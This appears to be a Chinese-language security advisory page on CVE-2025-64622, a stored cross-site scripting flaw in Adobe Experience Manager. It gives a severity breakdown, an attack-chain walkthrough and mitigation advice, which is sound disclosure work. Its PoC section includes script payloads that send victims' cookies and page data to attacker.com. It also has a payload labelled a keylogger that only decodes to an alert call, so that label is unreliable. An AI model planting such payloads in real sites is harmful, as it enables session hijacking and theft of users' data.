IPBUF安全漏洞报告
English
CVE-2025-64622 CVSS 5.4 中危

Adobe Experience Manager 存储型XSS漏洞 (CVE-2025-64622)

披露日期: 2025-12-10

漏洞信息

漏洞编号
CVE-2025-64622
漏洞类型
存储型XSS
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Adobe Experience Manager

相关标签

存储型XSSAdobe Experience ManagerCVE-2025-64622跨站脚本AEM内容管理系统

漏洞概述

CVE-2025-64622是Adobe Experience Manager中存在的一个存储型跨站脚本攻击(Stored XSS)漏洞。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。漏洞允许具有低权限的攻击者在表单字段中注入恶意JavaScript脚本。当其他用户浏览包含该恶意字段的页面时,注入的脚本会在受害者浏览器中执行,可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。由于该漏洞为存储型XSS,恶意脚本会被永久保存在服务器端,影响范围更广。CVSS评分5.4分,中危级别,需要用户交互才能触发。

技术细节

该存储型XSS漏洞存在于Adobe Experience Manager的表单处理模块中。攻击者通过利用低权限账户,在表单输入字段中注入恶意JavaScript代码。由于AEM对用户输入的过滤不充分,恶意脚本被存储在数据库或内容仓库中。当其他用户(尤其是管理员)访问包含该表单字段的页面时,浏览器会解析并执行存储的恶意脚本。攻击者可利用此漏洞窃取用户会话Cookie、伪造用户操作、植入进一步的攻击载荷或进行钓鱼攻击。由于漏洞位于服务端存储环节,攻击具有持久性和隐蔽性。

攻击链分析

STEP 1
步骤1
攻击者获取Adobe Experience Manager的低权限账户(如普通用户或内容编辑者权限)
STEP 2
步骤2
攻击者识别存在漏洞的表单字段,这些字段未对用户输入进行充分的HTML/Script过滤
STEP 3
步骤3
攻击者在表单字段中注入恶意JavaScript代码(如<script>标签或事件处理器)
STEP 4
步骤4
恶意脚本被存储在AEM的内容仓库或数据库中,成为页面内容的一部分
STEP 5
步骤5
当受害者(普通用户或管理员)访问包含该表单字段的页面时,浏览器解析并执行存储的恶意脚本
STEP 6
步骤6
攻击者通过恶意脚本窃取受害者的会话Cookie、凭据或其他敏感信息,或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- Stored XSS PoC for CVE-2025-64622 --> <!-- Attacker injects this payload into a vulnerable form field --> <script> // Steal session cookies document.location='https://attacker.com/steal?c='+document.cookie; </script> <!-- Alternative payload - Keylogger --> <img src=x onerror='eval(atob("YWxlcnQoJ0tleUV2ZW50OiAnK2V2ZW50LmtleSsnJyk="))'> <!-- jQuery-based session hijacking payload --> <script> $.get("https://attacker.com/exfil?data="+btoa(JSON.stringify({ cookie: document.cookie, url: window.location.href, ua: navigator.userAgent }))); </script>

影响范围

Adobe Experience Manager <= 6.5.23

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时缓解措施:1) 限制低权限用户对表单字段的编辑权限;2) 在Web应用防火墙(WAF)层面添加XSS过滤规则;3) 实施严格的Content Security Policy;4) 监控和审计用户提交的表单内容;5) 对管理员账户使用独立的会话管理和多因素认证。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表